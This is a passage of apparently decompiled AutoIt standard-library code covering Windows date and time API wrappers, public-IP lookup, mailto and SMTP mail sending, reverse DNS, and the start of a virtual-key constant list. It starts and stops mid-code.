SETERROR (@ERROR , @EXTENDED , 0 ) RETURN _DATE_TIME_SYSTEMTIMETOARRAY ($TSYSTEMTIME ) ENDFUNC FUNC _DATE_TIME_FILETIMETOSTR (BYREF $TFILETIME , $IFMT = 0 ) LOCAL $ADATE = _DATE_TIME_FILETIMETOARRAY ($TFILETIME ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) IF $IFMT THEN RETURN STRINGFORMAT ("%04d/%02d/%02d %02d:%02d:%02d" , $ADATE [2 ] , $ADATE [0 ] , $ADATE [1 ] , $ADATE [3 ] , $ADATE [4 ] , $ADATE [5 ] ) ELSE RETURN STRINGFORMAT ("%02d/%02d/%04d %02d:%02d:%02d" , $ADATE [0 ] , $ADATE [1 ] , $ADATE [2 ] , $ADATE [3 ] , $ADATE [4 ] , $ADATE [5 ] ) ENDIF ENDFUNC FUNC _DATE_TIME_FILETIMETODOSDATETIME ($TFILETIME ) LOCAL $ADATE [2 ] LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "bool" , "FileTimeToDosDateTime" , "struct*" , $TFILETIME , "word*" , 0 , "word*" , 0 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , $ADATE ) $ADATE [0 ] = $ARESULT [2 ] $ADATE [1 ] = $ARESULT [3 ] RETURN SETEXTENDED ($ARESULT [0 ] , $ADATE ) ENDFUNC FUNC _DATE_TIME_FILETIMETOLOCALFILETIME ($TFILETIME ) LOCAL $TLOCAL = DLLSTRUCTCREATE ($TAGFILETIME ) LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "bool" , "FileTimeToLocalFileTime" , "struct*" , $TFILETIME , "struct*" , $TLOCAL ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN SETEXTENDED ($ARESULT [0 ] , $TLOCAL ) ENDFUNC FUNC _DATE_TIME_FILETIMETOSYSTEMTIME ($TFILETIME ) LOCAL $TSYSTTIME = DLLSTRUCTCREATE ($TAGSYSTEMTIME ) LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "bool" , "FileTimeToSystemTime" , "struct*" , $TFILETIME , "struct*" , $TSYSTTIME ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN SETEXTENDED ($ARESULT [0 ] , $TSYSTTIME ) ENDFUNC FUNC _DATE_TIME_GETFILETIME ($HFILE ) LOCAL $ADATE [3 ] $ADATE [0 ] = DLLSTRUCTCREATE ($TAGFILETIME ) $ADATE [1 ] = DLLSTRUCTCREATE ($TAGFILETIME ) $ADATE [2 ] = DLLSTRUCTCREATE ($TAGFILETIME ) LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "bool" , "GetFileTime" , "handle" , $HFILE , "struct*" , $ADATE [0 ] , "struct*" , $ADATE [1 ] , "struct*" , $ADATE [2 ] ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN SETEXTENDED ($ARESULT [0 ] , $ADATE ) ENDFUNC FUNC _DATE_TIME_GETLOCALTIME () LOCAL $TSYSTTIME = DLLSTRUCTCREATE ($TAGSYSTEMTIME ) DLLCALL ("kernel32.dll" , "none" , "GetLocalTime" , "struct*" , $TSYSTTIME ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $TSYSTTIME ENDFUNC FUNC _DATE_TIME_GETSYSTEMTIME () LOCAL $TSYSTTIME = DLLSTRUCTCREATE ($TAGSYSTEMTIME ) DLLCALL ("kernel32.dll" , "none" , "GetSystemTime" , "struct*" , $TSYSTTIME ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $TSYSTTIME ENDFUNC FUNC _DATE_TIME_GETSYSTEMTIMEADJUSTMENT () LOCAL $AINFO [3 ] LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "bool" , "GetSystemTimeAdjustment" , "dword*" , 0 , "dword*" , 0 , "bool*" , 0 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) $AINFO [0 ] = $ARESULT [1 ] $AINFO [1 ] = $ARESULT [2 ] $AINFO [2 ] = $ARESULT [3 ] <> 0 RETURN SETEXTENDED ($ARESULT [0 ] , $AINFO ) ENDFUNC FUNC _DATE_TIME_GETSYSTEMTIMEASFILETIME () LOCAL $TFILETIME = DLLSTRUCTCREATE ($TAGFILETIME ) DLLCALL ("kernel32.dll" , "none" , "GetSystemTimeAsFileTime" , "struct*" , $TFILETIME ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $TFILETIME ENDFUNC FUNC _DATE_TIME_GETSYSTEMTIMES () LOCAL $AINFO [3 ] $AINFO [0 ] = DLLSTRUCTCREATE ($TAGFILETIME ) $AINFO [1 ] = DLLSTRUCTCREATE ($TAGFILETIME ) $AINFO [2 ] = DLLSTRUCTCREATE ($TAGFILETIME ) LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "bool" , "GetSystemTimes" , "struct*" , $AINFO [0 ] , "struct*" , $AINFO [1 ] , "struct*" , $AINFO [2 ] ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN SETEXTENDED ($ARESULT [0 ] , $AINFO ) ENDFUNC FUNC _DATE_TIME_GETTICKCOUNT () LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "dword" , "GetTickCount" ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _DATE_TIME_GETTIMEZONEINFORMATION () LOCAL $TTIMEZONE = DLLSTRUCTCREATE ($TAGTIME_ZONE_INFORMATION ) LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "dword" , "GetTimeZoneInformation" , "struct*" , $TTIMEZONE ) IF @ERROR OR $ARESULT [0 ] = + 4294967295 THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) LOCAL $AINFO [8 ] $AINFO [0 ] = $ARESULT [0 ] $AINFO [1 ] = DLLSTRUCTGETDATA ($TTIMEZONE , "Bias" ) $AINFO [2 ] = DLLSTRUCTGETDATA ($TTIMEZONE , "StdName" ) $AINFO [3 ] = __DATE_TIME_CLONESYSTEMTIME (DLLSTRUCTGETPTR ($TTIMEZONE , "StdDate" ) ) $AINFO [4 ] = DLLSTRUCTGETDATA ($TTIMEZONE , "StdBias" ) $AINFO [5 ] = DLLSTRUCTGETDATA ($TTIMEZONE , "DayName" ) $AINFO [6 ] = __DATE_TIME_CLONESYSTEMTIME (DLLSTRUCTGETPTR ($TTIMEZONE , "DayDate" ) ) $AINFO [7 ] = DLLSTRUCTGETDATA ($TTIMEZONE , "DayBias" ) RETURN $AINFO ENDFUNC FUNC _DATE_TIME_LOCALFILETIMETOFILETIME ($TLOCALTIME ) LOCAL $TFILETIME = DLLSTRUCTCREATE ($TAGFILETIME ) LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "bool" , "LocalFileTimeToFileTime" , "struct*" , $TLOCALTIME , "struct*" , $TFILETIME ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN SETEXTENDED ($ARESULT [0 ] , $TFILETIME ) ENDFUNC FUNC _DATE_TIME_SETFILETIME ($HFILE , $TCREATETIME , $TLASTACCESS , $TLASTWRITE ) LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "bool" , "SetFileTime" , "handle" , $HFILE , "struct*" , $TCREATETIME , "struct*" , $TLASTACCESS , "struct*" , $TLASTWRITE ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _DATE_TIME_SETLOCALTIME ($TSYSTEMTIME ) LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "bool" , "SetLocalTime" , "struct*" , $TSYSTEMTIME ) IF @ERROR OR NOT $ARESULT [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , FALSE ) $ARESULT = DLLCALL ("kernel32.dll" , "bool" , "SetLocalTime" , "struct*" , $TSYSTEMTIME ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _DATE_TIME_SETSYSTEMTIME ($TSYSTEMTIME ) LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "bool" , "SetSystemTime" , "struct*" , $TSYSTEMTIME ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _DATE_TIME_SETSYSTEMTIMEADJUSTMENT ($IADJUSTMENT , $BDISABLED ) LOCAL $HTOKEN = _SECURITY__OPENTHREADTOKENEX (BITOR ($TOKEN_ADJUST_PRIVILEGES , $TOKEN_QUERY ) ) IF @ERROR THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , FALSE ) _SECURITY__SETPRIVILEGE ($HTOKEN , "SeSystemtimePrivilege" , TRUE ) LOCAL $IERROR = @ERROR LOCAL $ILASTERROR = @EXTENDED LOCAL $BRET = FALSE IF NOT @ERROR THEN LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "bool" , "SetSystemTimeAdjustment" , "dword" , $IADJUSTMENT , "bool" , $BDISABLED ) IF @ERROR THEN $IERROR = @ERROR $ILASTERROR = @EXTENDED ELSEIF $ARESULT [0 ] THEN $BRET = TRUE ELSE $IERROR = 20 $ILASTERROR = _WINAPI_GETLASTERROR () ENDIF _SECURITY__SETPRIVILEGE ($HTOKEN , "SeSystemtimePrivilege" , FALSE ) IF NOT $IERROR AND @ERROR THEN $IERROR = 22 ENDIF _WINAPI_CLOSEHANDLE ($HTOKEN ) RETURN SETERROR ($IERROR , $ILASTERROR , $BRET ) ENDFUNC FUNC _DATE_TIME_SETTIMEZONEINFORMATION ($IBIAS , $SSTDNAME , $TSTDDATE , $ISTDBIAS , $SDAYNAME , $TDAYDATE , $IDAYBIAS ) LOCAL $TZONEINFO = DLLSTRUCTCREATE ($TAGTIME_ZONE_INFORMATION ) DLLSTRUCTSETDATA ($TZONEINFO , "Bias" , $IBIAS ) DLLSTRUCTSETDATA ($TZONEINFO , "StdName" , $SSTDNAME ) _MEMMOVEMEMORY ($TSTDDATE , DLLSTRUCTGETPTR ($TZONEINFO , "StdDate" ) , DLLSTRUCTGETSIZE ($TSTDDATE ) ) DLLSTRUCTSETDATA ($TZONEINFO , "StdBias" , $ISTDBIAS ) DLLSTRUCTSETDATA ($TZONEINFO , "DayName" , $SDAYNAME ) _MEMMOVEMEMORY ($TDAYDATE , DLLSTRUCTGETPTR ($TZONEINFO , "DayDate" ) , DLLSTRUCTGETSIZE ($TDAYDATE ) ) DLLSTRUCTSETDATA ($TZONEINFO , "DayBias" , $IDAYBIAS ) LOCAL $HTOKEN = _SECURITY__OPENTHREADTOKENEX (BITOR ($TOKEN_ADJUST_PRIVILEGES , $TOKEN_QUERY ) ) IF @ERROR THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , FALSE ) _SECURITY__SETPRIVILEGE ($HTOKEN , "SeTimeZonePrivilege" , TRUE ) LOCAL $IERROR = @ERROR LOCAL $ILASTERROR = @EXTENDED LOCAL $BRET = FALSE IF NOT @ERROR THEN LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "bool" , "SetTimeZoneInformation" , "struct*" , $TZONEINFO ) IF @ERROR THEN $IERROR = @ERROR $ILASTERROR = @EXTENDED ELSEIF $ARESULT [0 ] THEN $ILASTERROR = 0 $BRET = TRUE ELSE $IERROR = 20 $ILASTERROR = _WINAPI_GETLASTERROR () ENDIF _SECURITY__SETPRIVILEGE ($HTOKEN , "SeTimeZonePrivilege" , FALSE ) IF NOT $IERROR AND @ERROR THEN $IERROR = 22 ENDIF _WINAPI_CLOSEHANDLE ($HTOKEN ) RETURN SETERROR ($IERROR , $ILASTERROR , $BRET ) ENDFUNC FUNC _DATE_TIME_SYSTEMTIMETOARRAY (BYREF $TSYSTEMTIME ) LOCAL $AINFO [8 ] $AINFO [0 ] = DLLSTRUCTGETDATA ($TSYSTEMTIME , "Month" ) $AINFO [1 ] = DLLSTRUCTGETDATA ($TSYSTEMTIME , "Day" ) $AINFO [2 ] = DLLSTRUCTGETDATA ($TSYSTEMTIME , "Year" ) $AINFO [3 ] = DLLSTRUCTGETDATA ($TSYSTEMTIME , "Hour" ) $AINFO [4 ] = DLLSTRUCTGETDATA ($TSYSTEMTIME , "Minute" ) $AINFO [5 ] = DLLSTRUCTGETDATA ($TSYSTEMTIME , "Second" ) $AINFO [6 ] = DLLSTRUCTGETDATA ($TSYSTEMTIME , "MSeconds" ) $AINFO [7 ] = DLLSTRUCTGETDATA ($TSYSTEMTIME , "DOW" ) RETURN $AINFO ENDFUNC FUNC _DATE_TIME_SYSTEMTIMETODATESTR (BYREF $TSYSTEMTIME , $IFMT = 0 ) LOCAL $AINFO = _DATE_TIME_SYSTEMTIMETOARRAY ($TSYSTEMTIME ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) IF $IFMT THEN RETURN STRINGFORMAT ("%04d/%02d/%02d" , $AINFO [2 ] , $AINFO [0 ] , $AINFO [1 ] ) ELSE RETURN STRINGFORMAT ("%02d/%02d/%04d" , $AINFO [0 ] , $AINFO [1 ] , $AINFO [2 ] ) ENDIF ENDFUNC FUNC _DATE_TIME_SYSTEMTIMETODATETIMESTR (BYREF $TSYSTEMTIME , $IFMT = 0 ) LOCAL $AINFO = _DATE_TIME_SYSTEMTIMETOARRAY ($TSYSTEMTIME ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) IF $IFMT THEN RETURN STRINGFORMAT ("%04d/%02d/%02d %02d:%02d:%02d" , $AINFO [2 ] , $AINFO [0 ] , $AINFO [1 ] , $AINFO [3 ] , $AINFO [4 ] , $AINFO [5 ] ) ELSE RETURN STRINGFORMAT ("%02d/%02d/%04d %02d:%02d:%02d" , $AINFO [0 ] , $AINFO [1 ] , $AINFO [2 ] , $AINFO [3 ] , $AINFO [4 ] , $AINFO [5 ] ) ENDIF ENDFUNC FUNC _DATE_TIME_SYSTEMTIMETOFILETIME ($TSYSTEMTIME ) LOCAL $TFILETIME = DLLSTRUCTCREATE ($TAGFILETIME ) LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "bool" , "SystemTimeToFileTime" , "struct*" , $TSYSTEMTIME , "struct*" , $TFILETIME ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN SETEXTENDED ($ARESULT [0 ] , $TFILETIME ) ENDFUNC FUNC _DATE_TIME_SYSTEMTIMETOTIMESTR (BYREF $TSYSTEMTIME ) LOCAL $AINFO = _DATE_TIME_SYSTEMTIMETOARRAY ($TSYSTEMTIME ) RETURN STRINGFORMAT ("%02d:%02d:%02d" , $AINFO [3 ] , $AINFO [4 ] , $AINFO [5 ] ) ENDFUNC FUNC _DATE_TIME_SYSTEMTIMETOTZSPECIFICLOCALTIME ($TUTC , $TTIMEZONE = 0 ) LOCAL $TLOCALTIME = DLLSTRUCTCREATE ($TAGSYSTEMTIME ) LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "bool" , "SystemTimeToTzSpecificLocalTime" , "struct*" , $TTIMEZONE , "struct*" , $TUTC , "struct*" , $TLOCALTIME ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN SETEXTENDED ($ARESULT [0 ] , $TLOCALTIME ) ENDFUNC FUNC _DATE_TIME_TZSPECIFICLOCALTIMETOSYSTEMTIME ($TLOCALTIME , $TTIMEZONE = 0 ) LOCAL $TUTC = DLLSTRUCTCREATE ($TAGSYSTEMTIME ) LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "bool" , "TzSpecificLocalTimeToSystemTime" , "struct*" , $TTIMEZONE , "struct*" , $TLOCALTIME , "struct*" , $TUTC ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN SETEXTENDED ($ARESULT [0 ] , $TUTC ) ENDFUNC GLOBAL CONST $INET_LOCALCACHE = 0 GLOBAL CONST $INET_FORCERELOAD = 1 GLOBAL CONST $INET_IGNORESSL = 2 GLOBAL CONST $INET_ASCIITRANSFER = 4 GLOBAL CONST $INET_BINARYTRANSFER = 8 GLOBAL CONST $INET_FORCEBYPASS = 16 GLOBAL CONST $INET_DOWNLOADWAIT = 0 GLOBAL CONST $INET_DOWNLOADBACKGROUND = 1 GLOBAL CONST $INET_DOWNLOADREAD = 0 GLOBAL CONST $INET_DOWNLOADSIZE = 1 GLOBAL CONST $INET_DOWNLOADCOMPLETE = 2 GLOBAL CONST $INET_DOWNLOADSUCCESS = 3 GLOBAL CONST $INET_DOWNLOADERROR = 4 GLOBAL CONST $INET_DOWNLOADEXTENDED = 5 FUNC _GETIP () LOCAL CONST $GETIP_TIMER = 300000 LOCAL STATIC $HTIMER = 0 LOCAL STATIC $SLASTIP = 0 IF TIMERDIFF ($HTIMER ) < $GETIP_TIMER AND NOT $SLASTIP THEN RETURN SETEXTENDED (1 , $SLASTIP ) ENDIF LOCAL $AGETIPURL = ["https://api.ipify.org" , "http://checkip.dyndns.org" , "http://www.myexternalip.com/raw" , "http://bot.whatismyipaddress.com" ] , $ARETURN = 0 , $SRETURN = "" FOR $I = 0 TO UBOUND ($AGETIPURL ) + 4294967295 $SRETURN = INETREAD ($AGETIPURL [$I ] ) IF @ERROR OR $SRETURN == "" THEN CONTINUELOOP $ARETURN = STRINGREGEXP (BINARYTOSTRING ($SRETURN ) , "((?:\d{1,3}\.){3}\d{1,3})" , $STR_REGEXPARRAYGLOBALMATCH ) IF NOT @ERROR THEN $SRETURN = $ARETURN [0 ] EXITLOOP ENDIF $SRETURN = "" NEXT $HTIMER = TIMERINIT () $SLASTIP = $SRETURN IF $SRETURN == "" THEN RETURN SETERROR (1 , 0 , + 4294967295 ) RETURN $SRETURN ENDFUNC FUNC _INETEXPLORERCAPABLE ($SIESTRING ) IF STRINGLEN ($SIESTRING ) <= 0 THEN RETURN SETERROR (1 , 0 , "" ) LOCAL $S_IERETURN LOCAL $N_IECHAR FOR $I_IECOUNT = 1 TO STRINGLEN ($SIESTRING ) $N_IECHAR = "0x" & HEX (ASC (STRINGMID ($SIESTRING , $I_IECOUNT , 1 ) ) , 2 ) IF $N_IECHAR < 33 OR $N_IECHAR = 37 OR $N_IECHAR = 47 OR $N_IECHAR > 127 THEN $S_IERETURN = $S_IERETURN & "%" & STRINGRIGHT ($N_IECHAR , 2 ) ELSE $S_IERETURN = $S_IERETURN & CHR ($N_IECHAR ) ENDIF NEXT RETURN $S_IERETURN ENDFUNC FUNC _INETGETSOURCE ($SURL , $BSTRING = TRUE ) LOCAL $SSTRING = INETREAD ($SURL , $INET_FORCERELOAD ) LOCAL $IERROR = @ERROR , $IEXTENDED = @EXTENDED IF $BSTRING = DEFAULT OR $BSTRING THEN $SSTRING = BINARYTOSTRING ($SSTRING ) RETURN SETERROR ($IERROR , $IEXTENDED , $SSTRING ) ENDFUNC FUNC _INETMAIL ($SMAILTO , $SMAILSUBJECT , $SMAILBODY ) LOCAL $IPREV = OPT ("ExpandEnvStrings" , 1 ) LOCAL $SVAR , $SDFLT = REGREAD ("HKCU\Software\Clients\Mail" , "" ) IF $SDFLT = "Windows Live Mail" THEN $SVAR = REGREAD ("HKCR\WLMail.Url.Mailto\Shell\open\command" , "" ) ELSE $SVAR = REGREAD ("HKCR\mailto\shell\open\command" , "" ) ENDIF LOCAL $IRET = RUN (STRINGREPLACE ($SVAR , "%1" , _INETEXPLORERCAPABLE ("mailto:" & $SMAILTO & "?subject=" & $SMAILSUBJECT & "&body=" & $SMAILBODY ) ) ) LOCAL $IERROR = @ERROR , $IEXTENDED = @EXTENDED OPT ("ExpandEnvStrings" , $IPREV ) RETURN SETERROR ($IERROR , $IEXTENDED , $IRET ) ENDFUNC FUNC _INETSMTPMAIL ($SSMTPSERVER , $SFROMNAME , $SFROMADDRESS , $STOADDRESS , $SSUBJECT = "" , $ABODY = "" , $SEHLO = "" , $SFIRST = "" , $BTRACE = 0 ) IF $SSMTPSERVER = "" OR $SFROMADDRESS = "" OR $STOADDRESS = "" OR $SFROMNAME = "" OR STRINGLEN ($SFROMNAME ) > 256 THEN RETURN SETERROR (1 , 0 , 0 ) IF $SEHLO = "" THEN $SEHLO = @COMPUTERNAME IF TCPSTARTUP () = 0 THEN RETURN SETERROR (2 , 0 , 0 ) LOCAL $S_IPADDRESS , $I_COUNT IF STRINGREGEXP ($SSMTPSERVER , "^(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$" ) THEN $S_IPADDRESS = $SSMTPSERVER ELSE $S_IPADDRESS = TCPNAMETOIP ($SSMTPSERVER ) ENDIF IF $S_IPADDRESS = "" THEN TCPSHUTDOWN () RETURN SETERROR (3 , 0 , 0 ) ENDIF LOCAL $VSOCKET = TCPCONNECT ($S_IPADDRESS , 25 ) IF $VSOCKET = + 4294967295 THEN TCPSHUTDOWN () RETURN SETERROR (4 , 0 , 0 ) ENDIF LOCAL $ASEND [6 ] , $AREPLYCODE [6 ] $ASEND [0 ] = "HELO " & $SEHLO & @CRLF IF STRINGLEFT ($SEHLO , 5 ) = "EHLO " THEN $ASEND [0 ] = $SEHLO & @CRLF $AREPLYCODE [0 ] = "250" $ASEND [1 ] = "MAIL FROM: <" & $SFROMADDRESS & ">" & @CRLF $AREPLYCODE [1 ] = "250" $ASEND [2 ] = "RCPT TO: <" & $STOADDRESS & ">" & @CRLF $AREPLYCODE [2 ] = "250" $ASEND [3 ] = "DATA" & @CRLF $AREPLYCODE [3 ] = "354" LOCAL $ARESULT = _DATE_TIME_GETTIMEZONEINFORMATION () LOCAL $IBIAS = - $ARESULT [1 ] / 60 LOCAL $IBIASH = INT ($IBIAS ) LOCAL $IBIASM = 0 IF $IBIASH <> $IBIAS THEN $IBIASM = ABS ($IBIAS - $IBIASH ) * 60 $IBIAS = STRINGFORMAT (" (%+.2d%.2d)" , $IBIASH , $IBIASM ) $ASEND [4 ] = "From:" & $SFROMNAME & "<" & $SFROMADDRESS & ">" & @CRLF & "To:" & "<" & $STOADDRESS & ">" & @CRLF & "Subject:" & $SSUBJECT & @CRLF & "Mime-Version: 1.0" & @CRLF & "Date: " & _DATEDAYOFWEEK (@WDAY , 1 ) & ", " & @MDAY & " " & _DATETOMONTH (@MON , 1 ) & " " & @YEAR & " " & @HOUR & ":" & @MIN & ":" & @SEC & $IBIAS & @CRLF & "Content-Type: text/plain; charset=US-ASCII" & @CRLF & @CRLF $AREPLYCODE [4 ] = "" $ASEND [5 ] = @CRLF & "." & @CRLF $AREPLYCODE [5 ] = "250" IF __SMTPSEND ($VSOCKET , $ASEND [0 ] , $AREPLYCODE [0 ] , $BTRACE , "220" , $SFIRST ) THEN RETURN SETERROR (50 , 0 , 0 ) FOR $I_COUNT = 1 TO UBOUND ($ASEND ) + 4294967294 IF __SMTPSEND ($VSOCKET , $ASEND [$I_COUNT ] , $AREPLYCODE [$I_COUNT ] , $BTRACE ) THEN RETURN SETERROR (50 + $I_COUNT , 0 , 0 ) NEXT FOR $I_COUNT = 0 TO UBOUND ($ABODY ) + 4294967295 IF STRINGLEFT ($ABODY [$I_COUNT ] , 1 ) = "." THEN $ABODY [$I_COUNT ] = "." & $ABODY [$I_COUNT ] IF __SMTPSEND ($VSOCKET , $ABODY [$I_COUNT ] & @CRLF , "" , $BTRACE ) THEN RETURN SETERROR (500 + $I_COUNT , 0 , 0 ) NEXT $I_COUNT = UBOUND ($ASEND ) + 4294967295 IF __SMTPSEND ($VSOCKET , $ASEND [$I_COUNT ] , $AREPLYCODE [$I_COUNT ] , $BTRACE ) THEN RETURN SETERROR (5000 , 0 , 0 ) TCPCLOSESOCKET ($VSOCKET ) TCPSHUTDOWN () RETURN 1 ENDFUNC FUNC __SMTPTRACE ($SSTR , $ITIMEOUT = 0 ) LOCAL $SW_TITLE = "SMTP trace" LOCAL $SSMTPTRACE = CONTROLGETTEXT ($SW_TITLE , "" , "Static1" ) $SSTR = STRINGLEFT (STRINGREPLACE ($SSTR , @CRLF , "" ) , 70 ) $SSMTPTRACE &= @HOUR & ":" & @MIN & ":" & @SEC & " " & $SSTR & @LF IF WINEXISTS ($SW_TITLE ) THEN CONTROLSETTEXT ($SW_TITLE , "" , "Static1" , $SSMTPTRACE ) ELSE SPLASHTEXTON ($SW_TITLE , $SSMTPTRACE , 400 , 500 , 500 , 100 , 4 + 16 , "" , 8 ) ENDIF IF $ITIMEOUT THEN SLEEP ($ITIMEOUT * 1000 ) ENDFUNC FUNC __SMTPSEND ($VSOCKET , $SSEND , $SREPLYCODE , $BTRACE , $SINTREPLY = "" , $SFIRST = "" ) LOCAL $SRECEIVE , $I , $HTIMER IF $BTRACE THEN __SMTPTRACE ($SSEND ) IF $SINTREPLY <> "" THEN IF $SFIRST <> + 4294967295 THEN IF TCPSEND ($VSOCKET , $SFIRST ) = 0 THEN TCPCLOSESOCKET ($VSOCKET ) TCPSHUTDOWN () RETURN 1 ENDIF ENDIF $SRECEIVE = "" $HTIMER = TIMERINIT () WHILE STRINGLEFT ($SRECEIVE , STRINGLEN ($SINTREPLY ) ) <> $SINTREPLY AND TIMERDIFF ($HTIMER ) < 45000 $SRECEIVE = TCPRECV ($VSOCKET , 1000 ) IF $BTRACE AND $SRECEIVE <> "" THEN __SMTPTRACE ("intermediate->" & $SRECEIVE ) WEND ENDIF IF TCPSEND ($VSOCKET , $SSEND ) = 0 THEN TCPCLOSESOCKET ($VSOCKET ) TCPSHUTDOWN () RETURN 1 ENDIF $HTIMER = TIMERINIT () $SRECEIVE = "" WHILE $SRECEIVE = "" AND TIMERDIFF ($HTIMER ) < 45000 $I += 1 $SRECEIVE = TCPRECV ($VSOCKET , 1000 ) IF $SREPLYCODE = "" THEN EXITLOOP WEND IF $SREPLYCODE <> "" THEN IF $BTRACE THEN __SMTPTRACE ($I & " <- " & $SRECEIVE ) IF STRINGLEFT ($SRECEIVE , STRINGLEN ($SREPLYCODE ) ) <> $SREPLYCODE THEN TCPCLOSESOCKET ($VSOCKET ) TCPSHUTDOWN () IF $BTRACE THEN __SMTPTRACE ("<-> " & $SREPLYCODE , 5 ) RETURN 2 ENDIF ENDIF RETURN 0 ENDFUNC FUNC _TCPIPTONAME ($SIP , $IOPTION = DEFAULT , $HDLL = DEFAULT ) LOCAL $IINADDR_NONE = 4294967295 , $IAF_INET = 2 , $SSEPARATOR = @CR IF $IOPTION = DEFAULT THEN $IOPTION = 0 IF $HDLL = DEFAULT THEN $HDLL = "ws2_32.dll" LOCAL $AVDLLCALL = DLLCALL ($HDLL , "ulong" , "inet_addr" , "STR" , $SIP ) IF @ERROR THEN RETURN SETERROR (1 , 0 , "" ) LOCAL $VBINIP = $AVDLLCALL [0 ] IF $VBINIP = $IINADDR_NONE THEN RETURN SETERROR (2 , 0 , "" ) $AVDLLCALL = DLLCALL ($HDLL , "ptr" , "gethostbyaddr" , "ptr*" , $VBINIP , "int" , 4 , "int" , $IAF_INET ) IF @ERROR THEN RETURN SETERROR (3 , 0 , "" ) LOCAL $PVHOSTENT = $AVDLLCALL [0 ] IF $PVHOSTENT = 0 THEN $AVDLLCALL = DLLCALL ($HDLL , "int" , "WSAGetLastError" ) IF @ERROR THEN RETURN SETERROR (5 , 0 , "" ) RETURN SETERROR (4 , $AVDLLCALL [0 ] , "" ) ENDIF LOCAL $THOSTENT = DLLSTRUCTCREATE ("ptr;ptr;short;short;ptr" , $PVHOSTENT ) LOCAL $SHOSTNAMES = __TCPIPTONAME_SZSTRINGREAD (DLLSTRUCTGETDATA ($THOSTENT , 1 ) ) IF @ERROR THEN RETURN SETERROR (6 , 0 , $SHOSTNAMES ) IF $IOPTION = 1 THEN LOCAL $TALIASES $SHOSTNAMES &= $SSEPARATOR FOR $I = 0 TO 63 $TALIASES = DLLSTRUCTCREATE ("ptr" , DLLSTRUCTGETDATA ($THOSTENT , 2 ) + ($I * 4 ) ) IF DLLSTRUCTGETDATA ($TALIASES , 1 ) = 0 THEN EXITLOOP $SHOSTNAMES &= __TCPIPTONAME_SZSTRINGREAD (DLLSTRUCTGETDATA ($TALIASES , 1 ) ) IF @ERROR THEN SETERROR (7 ) EXITLOOP ENDIF NEXT RETURN STRINGSPLIT (STRINGSTRIPWS ($SHOSTNAMES , $STR_STRIPTRAILING ) , @CR ) ELSE RETURN $SHOSTNAMES ENDIF ENDFUNC FUNC __TCPIPTONAME_SZSTRINGREAD ($PSTR , $ILEN = + 4294967295 ) LOCAL $TSTRING IF $PSTR < 1 THEN RETURN "" IF $ILEN < 0 THEN $ILEN = _WINAPI_STRLEN ($PSTR , FALSE ) $TSTRING = DLLSTRUCTCREATE ("char[" & $ILEN & "]" , $PSTR ) IF @ERROR THEN RETURN SETERROR (2 , 0 , "" ) RETURN SETEXTENDED ($ILEN , DLLSTRUCTGETDATA ($TSTRING , 1 ) ) ENDFUNC GLOBAL CONST $VK_LBUTTON = 1 GLOBAL CONST $VK_RBUTTON = 2 GLOBAL CONST $VK_CANCEL = 3 GLOBAL CONST $VK_MBUTTON = 4 GLOBAL CONST $VK_XBUTTON1 = 5 GLOBAL CONST $VK_XBUTTON2 = 6 GLOBAL CONST $VK_BACK = 8 GLOBAL CONST $VK_TAB = 9 GLOBAL CONST $VK_CLEAR = 12 GLOBAL CONST $VK_RETURN = 13 GLOBAL CONST $VK_SHIFT = 16 GLOBAL CONST $VK_CONTROL = 17 GLOBAL CONST $VK_MENU = 18 GLOBAL CONST $VK_PAUSE = 19 GLOBAL CONST $VK_CAPITAL = 20 GLOBAL CONST $VK_KANA = 21 GLOBAL CONST 